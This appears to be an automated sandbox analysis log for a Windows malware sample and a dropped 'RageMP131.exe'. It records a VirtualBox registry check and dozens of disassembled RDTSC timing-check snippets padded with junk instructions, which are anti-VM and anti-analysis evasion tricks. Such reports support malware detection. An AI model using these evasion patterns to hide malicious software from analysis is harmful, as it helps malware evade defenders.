Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D562D6 second address: D562DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D562DE second address: D562E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D562E3 second address: D562E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D562E9 second address: D562ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D6484F second address: D64855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64855 second address: D6485D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64B36 second address: D64B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64B4B second address: D64B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64B51 second address: D64B7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FC734E5F776h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FC734E5F781h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC734E5F77Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64CB5 second address: D64CBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64CBB second address: D64CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64CC1 second address: D64CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64CC8 second address: D64CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC734E5F781h 0x0000000f jnc 00007FC734E5F776h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64CE9 second address: D64CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64CED second address: D64CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64E39 second address: D64E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734882085h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64E52 second address: D64E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64E56 second address: D64E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jp 00007FC734882076h 0x0000000f pop ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67781 second address: D677B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+124490C3h], edx 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D1CBDh], ebx 0x00000018 push 2C73CFFEh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC734E5F785h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D677B5 second address: D6782D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 2C73CF7Eh 0x00000010 mov edi, eax 0x00000012 push 00000003h 0x00000014 adc ecx, 7FD27F96h 0x0000001a push 00000000h 0x0000001c jl 00007FC73488207Ch 0x00000022 sub dword ptr [ebp+122D1C81h], esi 0x00000028 push 00000003h 0x0000002a mov edi, dword ptr [ebp+122D3AB2h] 0x00000030 call 00007FC734882079h 0x00000035 jg 00007FC734882088h 0x0000003b jmp 00007FC734882082h 0x00000040 push eax 0x00000041 push ecx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FC734882084h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D6782D second address: D67842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jbe 00007FC734E5F776h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67842 second address: D6787E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007FC734882076h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jp 00007FC73488208Ch 0x00000014 jmp 00007FC734882086h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jp 00007FC73488207Ch 0x00000025 jng 00007FC734882076h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D6796C second address: D67970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67970 second address: D67A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FC734882076h 0x0000000d jns 00007FC734882076h 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 jnc 00007FC734882080h 0x0000001f pop eax 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FC734882078h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a push 00000003h 0x0000003c mov dword ptr [ebp+122D2C80h], esi 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ecx 0x00000047 call 00007FC734882078h 0x0000004c pop ecx 0x0000004d mov dword ptr [esp+04h], ecx 0x00000051 add dword ptr [esp+04h], 0000001Bh 0x00000059 inc ecx 0x0000005a push ecx 0x0000005b ret 0x0000005c pop ecx 0x0000005d ret 0x0000005e mov ecx, dword ptr [ebp+122D3BE2h] 0x00000064 push 00000003h 0x00000066 jns 00007FC734882082h 0x0000006c call 00007FC734882079h 0x00000071 jmp 00007FC734882080h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FC73488207Eh 0x00000080 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67A2D second address: D67A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67A31 second address: D67A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67A37 second address: D67A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F785h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jp 00007FC734E5F77Eh 0x00000013 jnc 00007FC734E5F778h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67A69 second address: D67A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jg 00007FC734882076h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67A7E second address: D67B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC734E5F788h 0x00000008 jmp 00007FC734E5F781h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FC734E5F778h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b lea ebx, dword ptr [ebp+1244C644h] 0x00000031 jmp 00007FC734E5F789h 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 jmp 00007FC734E5F77Dh 0x0000003d jmp 00007FC734E5F77Dh 0x00000042 popad 0x00000043 push eax 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67BD8 second address: D67BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D57DAD second address: D57DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC734E5F776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D57DB7 second address: D57DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D57DBB second address: D57DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FC734E5F776h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FC734E5F776h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D865C5 second address: D865D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D865D0 second address: D865D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D57D94 second address: D57DA3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC734882076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D57DA3 second address: D57DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8689D second address: D868A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D86F69 second address: D86F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D86F7F second address: D86F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D86F85 second address: D86F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D870F1 second address: D870FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D870FC second address: D87101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8728D second address: D87298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D87852 second address: D8787F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC734E5F776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FC734E5F77Eh 0x00000013 pushad 0x00000014 popad 0x00000015 jo 00007FC734E5F776h 0x0000001b jmp 00007FC734E5F782h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8C234 second address: D8C239 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8C3A3 second address: D8C3EA instructions: 0x00000000 rdtsc 0x00000002 js 00007FC734E5F778h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FC734E5F786h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007FC734E5F789h 0x0000001b mov eax, dword ptr [eax] 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8C3EA second address: D8C40C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8C40C second address: D8C413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8C413 second address: D8C419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8ACD6 second address: D8ACDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8ACDA second address: D8ACE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FC734882076h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8ACE8 second address: D8ACEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D8C4EC second address: D8C4F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D92C74 second address: D92C7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC734E5F776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D92C7E second address: D92CB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882088h 0x00000007 jmp 00007FC73488207Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007FC734882076h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D92CB8 second address: D92CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D92CBC second address: D92CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FC734882080h 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D9680C second address: D96811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D96811 second address: D96816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D968B2 second address: D968B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D968B7 second address: D968E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jno 00007FC734882082h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007FC734882078h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D96F30 second address: D96F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D974AD second address: D974C2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC73488207Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D974C2 second address: D974D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 xchg eax, ebx 0x00000007 sbb si, 4817h 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D974D5 second address: D974D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D974D9 second address: D974E3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC734E5F776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D979AD second address: D979B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D97B35 second address: D97B5F instructions: 0x00000000 rdtsc 0x00000002 je 00007FC734E5F778h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FC734E5F788h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D98A2C second address: D98A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D98A32 second address: D98A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and esi, 7130E349h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FC734E5F778h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d sub edi, dword ptr [ebp+122D3A8Ah] 0x00000033 push 00000000h 0x00000035 mov esi, edi 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 pushad 0x0000003a jmp 00007FC734E5F782h 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D98A88 second address: D98A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D99AE8 second address: D99AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
